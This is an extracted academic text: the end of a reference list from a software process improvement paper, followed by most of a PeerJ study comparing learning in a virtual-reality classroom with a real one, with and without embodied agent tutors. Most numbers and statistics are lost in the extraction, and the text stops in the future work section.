(eurospi). berlin heidelberg: springer, – . shaw m. . writing good software engineering research papers: minitutorial. in: international conference on software engineering. piscataway: ieee, – . staples m, niazi m. . systematic review of organizational motivations for adopt- ing cmm-based spi. information and software technology ( – ): – doi . /j.infsof. . . . staples m, niazi m, jeffery r, abrahams a, byatt p, murphy r. . an exploratory study of why organizations do not adopt cmmi. journal of systems and software ( ): – doi . /j.jss. . . . stelzer d, mellis w. . success factors of organizational change in software pro- cess improvement. software process: improvement and practice ( ): – doi . /(sici) - ( ) : < ::aid-spip > . .co; - . theocharis g, kuhrmann m, münch j, diebold p. . is water-scrum-fall reality? on the use of agile and traditional development practices. in: proceedings of the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - -z http://www.iscn.com/images/spi_manifesto_a. . . .pdf http://www.iscn.com/images/spi_manifesto_a. . . .pdf http://dx.doi.org/ . /spip. http://dx.doi.org/ . /smr. http://dx.doi.org/ . /a: http://dx.doi.org/ . /a: http://dx.doi.org/ . /spip. http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /(sici) - ( ) : < ::aid-spip > . .co; - http://dx.doi.org/ . /(sici) - ( ) : < ::aid-spip > . .co; - http://dx.doi.org/ . /peerj-cs. international conference on product-focused software process improvement. lecture notes in computer science, vol. . berlin heidelberg: springer, – . tripp j, armstrong d. . exploring the relationship between organizational adoption motives and the tailoring of agile methods. in: hawaii international conference on system sciences (hicss), – . umarji m, seaman c. . why do programmers avoid metrics? in: proceedings of the international symposium on empirical software engineering and measurement. new york: acm, – . unterkalmsteiner m, gorschek t, islam a, cheng ck, permadi r, feldt r. . evaluation and measurement of software process improvement—a systematic literature review. ieee transactions on software engineering ( ): – doi . /tse. . . versionone. - . state of agile survey. available at http://www.versionone.com/ agile-resources/more-resources/blogs/ . viana d, conte t, vilela d, de souza crb, santos g, prikladnicki r. . the influence of human aspects on software process improvement: qualitative research findings and comparison to previous studies. in: international conference on evalua- tion & assessment in software engineering. iet, – . vijayasarathy l, butler c. . choice of software development methodologies—do project, team and organizational characteristics matter? ieee software : preprint doi . /ms. . . west d. . water-scrum-fall is the reality of agile for most organizations today. technical report. forrester. wieringa r, maiden n, mead n, rolland c. . requirements engineering paper classification and evaluation criteria: a proposal and a discussion. requirements engineering ( ): – . kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /tse. . http://www.versionone.com/agile-resources/more-resources/blogs/ http://www.versionone.com/agile-resources/more-resources/blogs/ http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. immersive virtual environments and embodied agents for e-learning applications immersive virtual environments and embodied agents for e-learning applications isabel s. fitton , daniel j. finnegan and michael j. proulx department of computer science, university of bath, bath, uk school of computer science & informatics, cardiff university, cardiff, uk department of psychology, university of bath, bath, uk abstract massive open online courses are a dominant force in remote-learning yet suffer from persisting problems stemming from lack of commitment and low completion rates. in this initial study we investigate how the use of immersive virtual environments for power-point based informational learning may benefit learners and mimic traditional lectures successfully. we examine the role of embodied agent tutors which are frequently implemented within virtual learning environments. we find similar performance on a bespoke knowledge test and metrics for motivation, satisfaction, and engagement by learners in both real and virtual environments, regardless of embodied agent tutor presence. our results raise questions regarding the viability of using virtual environments for remote-learning paradigms, and we emphasise the need for further investigation to inform the design of effective remote-learning applications. subjects human-computer interaction, computer education keywords virtual reality, distance learning, mooc, classroom, immersive virtual environments, e-learning, education introduction technological advancements have played a vital role in accommodating vast numbers of students through the growth of distance learning applications and e-learning platforms (kaplan & haenlein, ; kauffman, ). the predominant form of distance learning applications are massive open online courses (moocs). moocs offer access to teaching and material on a large scale via internet-based virtual learning environments for a limitless number of participants, making education more accessible (freitas & paredes, ). modern moocs involve a video captured recording of a human lecturer who delivers the learning content, facilitating the completion of homework or exams, and discussion via forums (feng et al., ). however, despite the potential of moocs to deliver teaching materials and content at a global scale, existing platforms suffer from issues with drop-out and learner motivation (yang et al., ). in parallel to e-learning platforms gaining popularity (sneddon et al., ), vr technology has increasingly been adopted in the classroom as a teaching aid for ‘hands-on’ skills-based teaching partly due to reductions in cost. for example in medicine, digital models are much cheaper compared to physical anatomical models for training students (rajeswaran et al., ). using digital models in a virtual reality scenario is a cost-effective way to educate students how to cite this article fitton is, finnegan dj, proulx mj. . immersive virtual environments and embodied agents for e-learning applications. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted october published november corresponding author isabel s. fitton, isf @bath.ac.uk academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright fitton et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:isf @�bath.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ on a large scale and as a result there is growing excitement regarding the potential of vr to revolutionise education and e-learning (greenwald et al., ). while vr is regarded as beneficial to students as a practical teaching aid, its application to formal, lecture style teaching—which e-learning platforms tend to deliver—is less common (korallo, ). the use of immersive virtual environments (ives) for corporate and higher-education purposes have only recently begun to emerge. due to such applications being in their infancy there is very little empirical evaluation of their efficacy or research available to inform their design. a key component of many ives is the presence of an embodied agent (ea) which, in the context of learning, may serve as a virtual guide or tutor. the use of eas as virtual tutors within educational ives is critical for effective pedagogy (soliman & guetl, ). previous research suggests that the representation of artificial agents affects learners’ motivation (maldonado & nass, ). for example an ea may be customised by the learner to suit their preference—such customisation has been shown to improve performance for some cognitive tasks (lin et al., ). in another study that tested male vs. female pedagogical agents, the female seemed to be preferred overall (novick et al., ). a recent systematic review of pedagogical agents noted that positive results have been found in numerous studies, yet different combinations of features and different outcome variables have not been systematically studied to clarify which features work best or when (martha & santoso, ). however, it is unclear how the presence of an ea and learner motivation interact. a clear and robust analysis of these factors and their impact on the learning experience is critical for future application of ives as engaging platforms for distance learning. furthermore, the recent novel sars-cov- (covid- ) pandemic has had huge repercussions for higher education across the world. as millions of people were restricted to not leaving their homes for extended periods of time, many institutions also shifted to remote delivery of learning material for the academic year / . although this presents challenges around blended learning and flipped classroom design, our focus remains on technology and how it may act as a medium for learning material delivery as opposed to what content such material should contain. our main contribution in this work is an empirical investigation into factors which impact the overall student experience when learning in ives. specifically we report how the presence of an embodied teacher and students’ sense of presence in the environment impact learning retention, satisfaction and engagement, and student motivation to engage with learning material presented in an ive. our results demonstrate how learning in ives is comparable to real classroom learning, yet can scale far beyond the limits of traditional classrooms with constraints such as staff-student ratio and classroom size. finally, we emphasise implications for future work in designing and assessing ives for remote learning purposes. background as distance learning continues to expand, catering for larger numbers of students across the globe, current solutions provide inefficient delivery systems which are not immersive, engaging, or motivating to the learner—often resulting in poor rates of completion fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (wise et al., ; yang et al., ; chen, ). for example an investigation into the use of ‘accountable talk: conversation that works’, a mooc provided by the university of pittsburgh, revealed that despite in excess of , students registering for the programme less than half continued to access the course material through to completion (rosé et al., ). attrition rates of learners in moocs is much higher than that in formal education (clow, ; joo, so & kim, ). users also report that they do not perceive moocs as equivalent to traditional education, and their engagement with them is less serious (nemer & o’neill, ). as a result, moocs are unable to deliver educational experiences with the same rigour as formal educational institutions. while moocs have several short-comings, the ability to study without being physically located in a certain space has many advantages to both students unable to attend and universities who are coping with growing numbers of students. therefore, finding ways to improve the experience of distance learning and encouraging greater levels of engagement with online courses is of great public interest and their efficacy in education is of equal pedagogic interest. bringing learners into ives may overcome engagement issues experienced in moocs. students prefer to engage in traditional lectures over online courses because they lack self-discipline and they can become too easily distracted during online learning (crook & schofield, ). applying immersive vr to education may engage students better than moocs, removing distractions outside of the learning environment, mimicking the experience of traditional learning experiences (lessick & kraft, ; pirker et al., ). existing examples of educational applications of vr have focused on non immersive desktop-vr and have shown that simulating learning environments is highly effective. for example desktop-vr has been successfully used for social cognition training in children with autism spectrum disorders and for assessing procedural skills such as dissecting frogs in a laboratory study (didehbani et al., ; merchant et al., ). ive based learning environments have shown that learning using vr results in better retention and improves learners’ performance by up to a grade compared to simply watching a lecture or reading (sitzmann, ; graesser et al., ). while educational applications of desktop-vr have merit, research suggests ives lead to better results as interaction with the environment is more intuitive, therefore users spend less time learning how to use the computer interface and can focus their full attention on the task (psotka, ). to date, ives have been predominantly applied to procedural and skills-based education, successfully enhancing learning outcomes. for example the performance of a group of material science students on a series of questions about crystal structures improved when they were presented with virtual d diagrams of crystal structures via a head-mounted display (hmd), compared to using d diagrams (caro et al., ). the ability to manipulate and rotate the crystals in the ive helped students understand the relationships between atoms and perform better in assessment tasks than those who studied the textbook diagrams. additionally, students reported that the ive was easy to use and preferable over the d format. ives are also commonly used successfully to train complex psychomotor skills required by medical students. for example airwayvr provides a safe, immersive environment to practice fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ endotracheal intubation procedures, leading to clear improvements in students’ self-reported understanding of the procedure compared to their knowledge prior to using the application (rajeswaran et al., ). recent research suggests applying ives to lecture-styled learning may provide distance learners with enriched learning experiences that are more immersive, enjoyable, and realistic (chen, ). preliminary research has shown the value in using ives to replicate classroom learning, finding that students perform better on a quiz about the topic after watching a virtual lecture compared to watching a video recording of a lecture, as is typically done in moocs (tsaramirsis et al., ). additionally, all learners reported that they preferred the ive as it was more enjoyable, reinforcing the idea that ives are likely to successfully engage a larger number of distance learners than mooc platforms. however, while educational applications of ives for distance learning in both higher education and corporate level training have begun to emerge, these applications are in their infancy. recent work has explored the use of modern game development engines and hmd based environments for creating virtual lecture theatres and classrooms (misbhauddin, ), but has not explored how effective these environments are at improving learner performance, motivation, and satisfaction & engagement. as such, to the best of our knowledge there are currently no published findings regarding their effectiveness, resulting in very little robust evidence to inform how the design of an ive impacts learning outcomes (moro, stromberga & stirling, ). when designing ives, one does not consider just the aesthetic, but also the presence of other agents inside the environment. within ives, embodied agents (eas) are frequently used as pedagogical agents for virtual tutoring. for example steve is a human-like ea used to teach engineers how to use complex machinery onboard ships (johnson & rickel, ). in addition to humanoid eas there are non-human examples such as herman the bug—a non-humanoid ea implemented in design-a-plant, a virtual environment used to teach children about plant biology and the environment (lester, stone & stelling, ). the appearance and behaviour of ea tutors influences learners’ feelings of co-presence (baylor, ; baylor & kim, )—the perception that one is not alone but in the presence of others (heeter, ; short, williams & christie, ). co-presence increases when an ea tutor has appearance and behavioural realism—a key point being that there is no mismatch between appearance and behavioural realism, as this results in very low levels of perceived co-presence (bailenson et al., ). increasing a learner’s perceived co-presence increases learner satisfaction and motivation to engage with material. for example it has been shown that learners spend approximately % more time learning and report that the learning experience is more enjoyable when an ea is present (sträfling et al., ). a limitation of current distance learning platforms, such as moocs, is that learners must try to maintain enthusiasm and motivation to complete the course in the absence of an educator (hasegawa, uğurlu & sakuta, ). implementing an appropriate ea which represents a lecturer within an ive may maintain learner interest and motivation, positively impacting learning outcomes. the appearance of the virtual tutor impacts a learner’s perception fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the tutor’s abilities. for example human-like agents are perceived as more intelligent and helpful compared to non-human agents (king & ohya, ; lester & stone, ), while familiar agents are rated more positively than unfamiliar agents (bailenson et al., ). previous research has demonstrated that virtual tutor realism influences learners’ reported likability and motivation (maldonado & nass, ), in turn influencing performance. thus, we expect that a realistic ea tutor which is familiar to the learner will be more likeable, improving the learning experience and motivation to learn (maldonado & nass, ; scaife & rogers, ). while some evidence suggests that eas play a substantial role in the learning experience, increasing learning efficiency and retention (roussou, oliver & slater, ), others have found minimal-to-no effect of eas on learning outcomes. for example in one study eas were found to have no influence and prior knowledge was identified as the greatest contributing factor to learner performance (sträfling et al., ). therefore, to clearly establish the utility of eas within ives researchers should aim to control this potentially extraneous variable to prevent participants’ prior knowledge of the topic concealing any effects of the ea. overall, ives for educational purposes have the potential to mimic traditional learning experiences greater than moocs. by utilising ives to develop more engaging distance learning experiences, universities and corporate training bodies may cater for increasing student numbers. however, a major barrier to implementing ives compared to moocs is the higher relative cost of the equipment required. therefore, it is essential that interdisciplinary research is conducted to establish whether ives, which can be run on low powered hardware such as smartphones, are able to provide a method of engaging more students, provide remote-learners with an experience which is more equivalent to formal education, and make a worthwhile contribution to higher education institutions looking to provide effective distance learning. user study our study focuses on the educational applications of ives, specifically investigating the effectiveness of learning novel information in an ive compared to a physical classroom, and the role of eas as tutors within the ives. we devised the following hypotheses: h : participants who learn inside an ive will learn more effectively and outperform participants who learn in a physical classroom since prior research has shown that virtual learning environments result in better retention and improves performance (sitzmann, ; graesser et al., ). h : participants who learn in the presence of an ea tutor will outperform participants who learn without one because the presence of a virtual tutor influences motivation which may in turn influence performance (sträfling et al., ). h : the presence of a humanoid ea tutor will be more likable and increase motivation in learners compared to an abstract ea tutor because more familiar and realistic tutors are more likeable and motivating (bailenson et al., ; maldonado & nass, ). fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ materials and methods a between-participant design was used, whereby participants were randomly assigned to one of the four learning conditions. the independent variable was the learning environment (ive with no tutor, ive with a humanoid tutor, ive with an abstract tutor, non-virtual learning environment). the dependent variables were performance (test score), and reported motivation, satisfaction, and engagement (questionnaire). the experiment lasted approximately ∼ min. design and apparatus opportunity sampling was used to recruit participants from a local university. the target sample size for this initial study was participants, split equally between the four learning conditions, based on the results of an a-priori power analysis, conducted using g*power (faul et al., ), revealing a one-way anova with participants per group would provide % power to detect an effect size of . at a significance level of . . note that we instead used a more conservative kruskal–wallis test rather than the anova to evaluate the results; prior work has shown that kruskal–wallis has greater statistical power than anova under these conditions, so the analyses presented were indeed sufficiently powered (hecke, ). in total, participants were recruited ( m, f), aged and over (m = . years, sd = . years). all participants were students from a variety of disciplines who reported normal or corrected to normal vision and hearing. participants were incentivized through course credit (n = ), £ reward (n = ), or simply volunteered to participate (n = ). statistical tests confirmed that there was no significant effect of the type of incentive received on participant performance (see supplemental material). a machine running windows with a single nvidia gpu was adequate to drive the virtual environment since it is without cutting-edge graphics. to display the virtual environment, we used the htc vive hmd. this hmd covers a degrees field of view, with two , × , pixel screens to render stereoscopic graphics to the viewer. head position and orientation were tracked using the hardware base stations packaged with the hmd. however, the environment can also be demoed as a mobile application and we expect that in a larger cohort the set up could be easily scaled up using more consumer-friendly devices such as smartphones and google cardboards. learning environments & material a seminar room on a local university campus was used as the non-virtual learning environment (see fig. ). a powerpoint presentation was projected onto the screen to display the learning material and the female experimenter represented the tutor, reading a script alongside each slide (see supplemental materials). a virtual replica of the physical classroom, made to scale in order to minimise the number of extraneous variables (fig. c) was created using unity . . . to replicate the appearance, colours and textures were applied and generic classroom furniture were used to decorate the virtual environment. to display the powerpoint slides in the ives, custom software applied images of the powerpoint slides as textures to the virtual projector fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ screen. the lecture slide changed to the next one in sequence when spacebar was pressed. audio recordings of the female experimenter reading the script were automatically played with each slide to keep delivery of the lecture material consistent for all participants. for the ive with a humanoid tutor, a female avatar was created using adobefuse cc beta and imported into the environment (fig. a). the female avatar has an animator controller to loop an ‘idle’ and an ‘eye blink’ motion to appear more realistic. for the ive with an abstract tutor, a block-shape representation was created from geometrically primitive shapes (fig. b). the abstract tutor was animated using key frame animation which moved the body side-to-side and rotated the eyes to replicate the humanoid ‘idle’ and ‘blink’ motions. novel information was created for this study about the developmental stages of a made-up alien species. this was used as the learning material in order to eliminate the possibility of prior knowledge becoming a confounding variable (see supplemental material). questionnaire all data were recorded using qualtrics, a web browser interface that automatically recorded responses from participants. the first section of the questionnaire contained the knowledge test, composed of questions designed to test participants’ knowledge of the alien species. the majority of the questions were multiple choice in order to test retention, with some short answer questions to test comprehension (schrader & bastiaens, ) (see supplemental material). however, multiple choice tests have been critiqued as they ‘feed’ students the answers, making it possible to gain artificially high scores (bush, ). therefore to accurately reflect retention, the test was negatively marked (meaning correct answers were given a score of , incorrect answers scored − , and any figure the humanoid embodied agent tutor (a), the non-human tutor (b), a view of the entire virtual classroom environment (c), a view from the perspective of participants in our experiment showing the novel learning material (d), and a view of the real world classroom (e). participants sat in the same position in both real and virtual environments as shown by the red circles. full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unanswered questions scored ) to discourage guessing (davies, ). the test was marked to produce a score to indicate participant performance. three blocks of questions followed: learner satisfaction and engagement ( items); learner motivation ( items); and virtual presence ( items; see supplemental materials for the questionnaire). learner satisfaction and engagement the questions designed to measure satisfaction and engagement with the learning experience were -point likert scales which asked participants how strongly they agreed or disagreed with the statements. for example “the learning experience captured my interest”. each item was scored out of five ( = strongly agree) and added together to produce a learner satisfaction and engagement score out of . the questions were created for the purpose of this experiment as it aimed to measure specifically how engaged ‘students’ were in this one experience. we had considered using an existing student satisfaction questionnaire but opted to develop our own so that questions could be focused on the experience in our study. learner motivation another block of questions was specifically tailored to investigate the effects of the ea tutor manipulation on learner motivation, for example “the presence of the tutor increased my motivation to learn”. each item included a -point likert scale which asked participants to what extent they agreed with each statement, with ‘strongly agree’ being scored as five. the item scores were added together to produce a learner motivation score out of . virtual presence the virtual presence questions were taken from an existing questionnaire (witmer & singer, ). the most applicable items were selected, for example “to what degree did your experiences in the virtual environment seem consistent with your real-world experiences?”, participants responded to each statement via a -point scale ( = not at all, = completely) to indicate how immersive the ives were, and this produced a virtual presence score out of . finally, to measure any potentially confounding effects, participants in the ive with a humanoid tutor were asked to report anything they found ‘odd’ about the human avatar, as a perceived mismatch between appearance and expected behaviour, for example ‘speaking’ with no changing facial expression or lip movement, could lead to disliking of the tutor and affect performance (mori, ; bailenson et al., ). procedure this study was approved by the university of bath psychology research ethics committee ( - ). participants were provided with further information about the study before giving written informed consent. only one participant took part in the experiment at a time. each participant was randomly allocated to one of the four learning conditions. participants in the ives were seated at a computer in the laboratory, the experimenter would assist with fitting the headset and headphones to ensure the participant was fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comfortable. the experimenter would then launch the appropriate classroom application (i.e. with a humanoid/abstract/no tutor). participants allocated to the non-virtual condition were seated in a seminar room on the university campus. participants in the non-virtual condition took part in the experiment individually: the only other person present in the room was the experimenter. in both virtual and non-virtual conditions participants were shown the same powerpoint presentation, and heard the same experimenter deliver the scripted information. the only difference being that in the virtual condition the voice-clips were pre-recorded and incorporated into the environment, whereas in the non-virtual condition the experimenter delivered the information in person. in all conditions, participants observed the full presentation with corresponding audio once, and were then allowed the remaining time to read through the slides themselves with no audio input. after -minutes the experimenter halted the learning part of the experiment, and those in the ives would be asked to remove the headset. all participants were then required to complete the online test and questionnaire. throughout the experiment, all participants remained naïve to the manipulation of the tutor and the environment. afterwards all participants were fully debriefed, and the full aims of the study were revealed, participants then provided final consent for the data to be used. analysis and results frequentist null hypothesis significance testing and the associated p-value has many shortcomings, for example it relies on hypothetical data and can be easily manipulated— with larger sample sizes able to make small differences significant without any practical value (jarosz & wiley, ; dienes, ). bayes factor (bf) is a ratio which indicates the likelihood of the observed data fitting under either of the two hypotheses. therefore, bayesian statistics were conducted using jasp version . to determine the relative strength of the support for the null vs. alternative hypotheses. bf represents the likelihood that the evidence is explained by one hypothesis over another, for example a bf of would indicate that one hypothesis is times more likely to explain the data. bf can be given as bf (evidence for the alternative hypothesis) or bf (evidence for the null hypothesis) (schut et al., ). we used bf values as they are easier to interpret in relation to our findings. based on this interpretation scheme, bf values of – indicate moderate support for the null hypothesis, while values < indicate weak support for the null hypothesis (wagenmakers et al., ). tables and presents a summary of these results. additional statistical analyses carried out using spss version . were evaluated against an alpha level of . . an independent t-test was used to determine differences in learner motivation between the humanoid tutor ive and the abstract tutor ive. assumption checking revealed that the data were normally distributed as assessed by the shapiro–wilk test (p > . ), and the variance in each group was approximately equal, as assessed by levene’s test for homogeneity of variances (p > . ). however, due to the small sample size three kruskal–wallis tests were conducted to compare learner performance, satisfaction and engagement, and virtual presence ratings across multiple fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning conditions. preliminary analyses confirmed that the data met the test assumptions as there were no extreme outliers, and there was homogeneity of variances. learner performance mean scores for learner performance in each learning conditions are shown in fig. . on average, learner performance was similar across all learning environments, with only table t-test results for the impact of tutor on motivation to learn. abstract tutor humanoid tutor measure m sd m sd t( ) p d motivation . . . − . . − . figure mean test scores in the different learning environments. error bars represent the standard error (se). dots show distribution of participant scores, with larger dots indicating multiple participants with the same score. full-size doi: . /peerj-cs. /fig- table kruskal–wallis results summary covering the three core variables in our study: learner performance, satisfaction & engagement, and sense of presence. non-virtual virtual, no tutor virtual, humanoid tutor virtual, abstract tutor h( ) p η measure m sd m sd m sd m sd performance . . . . . . . . . . . no tutor humanoid tutor abstract tutor h( ) p η m sd m sd m sd satisfaction & engagement . . . . . . . . . presence . . . . . . . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ slight differences among conditions. with respect to h and h , we conducted a kruskal– wallis test and results report no statistically significant differences in performance scores between conditions, h( ) = . , p = . , η = . , this result is moderately reinforced by the bayes statistics which indicate that the data are six times more likely to be explained by the null hypothesis (bf = . ). learner satisfaction and engagement mean scores for learner satisfaction and engagement in each virtual learning condition are shown in fig. . learner satisfaction and engagement levels, as measured by seven items in the questionnaire (cronbach a = . ), were similar across all virtual learning conditions, with only slightly higher levels measured in the ive with no tutor. a kruskal–wallis test supported that learner satisfaction and engagement levels were not significantly different between the virtual learning conditions, h( ) = . , p = . , η = . furthermore, bayes statistics indicate that the data are four times more likely to be explained by the null hypothesis (bf = . ). learner motivation mean scores for learner motivation in the presence of humanoid and non-humanoid eas are shown in fig. . learner motivation scores, measured using three items in the questionnaire (cronbach a = . ), appeared higher in the ive with the abstract tutor (m = . , sd = . ) compared to learner motivation scores in the ive with the humanoid tutor (m = . , sd = . ). with respect to h , an independent samples t-test revealed that these differences in learner motivation between conditions were not significantly different, t( ) = − . , p = . , d = − . . however, bayes statistics only indicate very figure mean satisfaction and engagement scores with error bars representing se, for the predictor of learning condition within immersive virtual environments (no tutor, humanoid tutor, abstract tutor). the real environment was not modelled as a condition in this analysis and therefore means for three conditions are shown. error bars and dots as in fig. . full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weak support for the null hypothesis in this case as it suggests that the null hypothesis is only one times more likely to explain the data (bf = . ). virtual presence virtual presence was measured using only a subset of witmer and singer’s presence questionnaire so measures of internal reliability were not conducted. learner ratings of virtual presence were consistent across the different ives (no tutor m = . , sd = . ; human tutor m = . , sd = . ; abstract tutor m = . , sd = . ). a kruskal–wallis test supported that virtual presence scores were not significantly different between the virtual reality learning conditions, h( ) = . , p = . , η = . , furthermore bayes statistics provide moderate support for the null (bf = ). learner perceptions of avatar in response to the question “did you notice anything odd about the human avatar?” % of the participants in the ive with the humanoid tutor reported that they did find the humanoid ea tutor strange. the reasons for answering ‘yes’ to the question were that the avatar had strange or repetitive movement, no changing facial expressions, and did not speak. discussion previous research and educational applications of vr have focused on desktop-vr simulations for skills-based tasks (freina & ott, ), neglecting the use of more ives and their potential use for informational, lecture-styled learning experiences. therefore, in this pilot study we investigated to what extent informational-learning within an ive is effective compared to learning in a physical classroom. we created a virtual replica of a figure results of a t-test conducted to analyse the impact of humanoid vs. abstract tutor representation on learner motivation scores, and therefore means for two conditions are shown. error bars and dots as in fig. . full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classroom and compared its use for informational learning to the traditional, real-world classroom. previous literature indicated that simulated learning environments are highly effective, enhance declarative knowledge, and lead to better retention compared to conventional learning methods (graesser et al., ; merchant et al., ; sitzmann, ). while desktop-vr has dominated the literature, it is argued that more immersive experiences may lead to even greater results (psotka, ). therefore, we hypothesised that participants who learned virtually would outperform participants who learned non-virtually (h ). however, results demonstrated that participants who learned virtually did not outperform participants who learned non-virtually. a bf analysis provides moderate support for this finding as it suggests that the data are six times more likely to be explained by the null hypothesis. it is plausible that familiarity with learning material, which is known to impact learner engagement, performance, and motivation (schönwetter, clifton & perry, ), would have impacted our results: to combat this effect we used fabricated information to eliminate prior knowledge as a confounding variable. thus our findings are robust, indicating there is no detriment to learning in an ive compared to a conventional classroom setting (madden et al., ). the lack of a statistically significant difference in learner performance between the ive and the non-virtual classroom is of particular importance as educational institutions are under increasing pressure to cater for large numbers of students, and as such require effective distance learning applications (kauffman, ). current distance learning platforms suffer from poor student engagement and high levels of drop-out (yang et al., ), however, ives have the potential to improve this. previous research has demonstrated that ives provide a more engaging platform for distance learners than existing video-based applications (tsaramirsis et al., ). in light of the covid- pandemic and its impact on the higher education sector, namely creating situations where many institutions have closed their campus until further notice, ives may yield a better experience for distance learners. furthermore, our research supports that distance learning applications would benefit from incorporating the use of ives, as distance-learner performance would be consistent with learners in traditional settings, yet ives can be used on a much larger scale, making them highly cost-efficient. the role of embodied agents few studies have been conducted which inform how the design and use of ea tutors impacts the learner experience (moro, stromberga & stirling, ), so we investigated the role of ea tutors within ives. we manipulated the tutor in the ive on two dimensions; its presence or absence, and its human-like representation. previous research has suggested that co-presence influences the learning experience, with higher feelings of co-presence resulting in greater learning performance (roussou, oliver & slater, ; wise et al., ). therefore, we hypothesised that participants who learn in the presence of an ea tutor will outperform participants who learn in its absence. we found no statistically significant difference in performance of learners who learned without a virtual tutor, with a humanoid tutor, or with an abstract tutor. participants who fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learned in the ive without an ea tutor were expected to perform worse on the post-learning test. our findings fit into current discourse and debate on the utility of eas and their impact on learning: while some research has concluded no impact on performance, consistent with ours (sträfling et al., ), other research has found that eas do impact learning performance (baylor amy, ; maldonado & nass, ; rosenberg-kima et al., ). one explanation for our results is the age of participants in our study. previous research in agreement with our results used young adults (sträfling et al., ), while others have recruited young school children (roussou, oliver & slater, ). the presence of virtual avatars is known to positively impact learning in young children (darves, oviatt & coulston, ) and it is possible that the positive impact of ea tutors on learner performance may be confined to when ives are used by younger students (baylor & kim, ; ashby plant et al., ). embodied agent tutors impact learner satisfaction and engagement within ives by simulating the relationship between student and tutor (alseid & rigas, ). a learner’s social judgement of interactions with an ea impacts perceived co-presence and satisfaction, with human-like representations regarded as more social than non-human avatars (nowak, ). therefore, we hypothesised that a humanoid ea tutor would be preferred over an abstract ea. however, our results show no statistically significant differences in learner satisfaction and engagement when comparing the ive with no tutor, the humanoid tutor, or the abstract tutor. bf analysis indicates that the data were four times more likely to be explained by the null hypothesis in this instance and therefore can be accepted with moderate confidence (wagenmakers et al., ). although measures were taken to provide the humanoid tutor with a realistic appearance and behaviour, such as using deictic gestures and a natural human voice (atkinson, mayer & merrill, ; baylor, ; baylor & ryu, ; janse, ), the avatar was not equipped with any animations which replicated changing facial expressions. this may have hindered the level of satisfaction and engagement the humanoid tutor was able to evoke in the learners, which is known to influence perceived realism (atkinson, ). in our study, many participants exposed to the humanoid tutor commented on the absence of facial expression, with the majority of participants feeling as though it had ‘strange’ and ‘repetitive movement’. in contrast, participants did not have pre-defined expectations of how the abstract tutor should behave and as such it was not susceptible to the uncanny valley effect, unlike the humanoid avatar (bailenson et al., ; mori, ). therefore, rather than the humanoid tutor increasing motivation, participants may have found the abstract tutor more appealing. this mismatch between learner expectations of the tutor and reality may have been detrimental to the perceived co- presence (bailenson et al., ). therefore, it is possible that a lack of emotional expression in the humanoid avatar contributed to the absence of significantly greater learner satisfaction and engagement. previous research has indicated that ea tutors affect learning outcomes indirectly by influencing learner motivation (baylor, ). research suggests greater likeability, and ascribed intelligence when using a humanoid ea tutor (king & ohya, ; fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lester & stone, ); therefore, we expected the humanoid tutor would increase levels of learner motivation. however, there was no statistically significant difference in learner motivation between the humanoid and abstract tutor groups immersed in the vle. bf analysis suggests that the data are almost equally likely to be explained by either the null or the alternative hypothesis. thus, we do not rule out the possibility that tutor appearance can affect motivation. a distinct strength of our study is the control for immersion as a factor which could influence the efficacy of ives, as the more immersive the environment the more comparable it is thought to be to real-world environments. to determine if learning outcomes are affected by immersion a virtual-presence questionnaire was used. the results indicated similarly high levels of immersion in all three ives, meaning that the ives are comparable to non-virtual learning (peperkorn, diemer & mühlberger, ; shin, ) and ensuring that environment quality was unlikely to produce any differences in learning outcomes. future work while this pilot study provides preliminary support for the use of ives by demonstrating that learning within an ive is not significantly different to 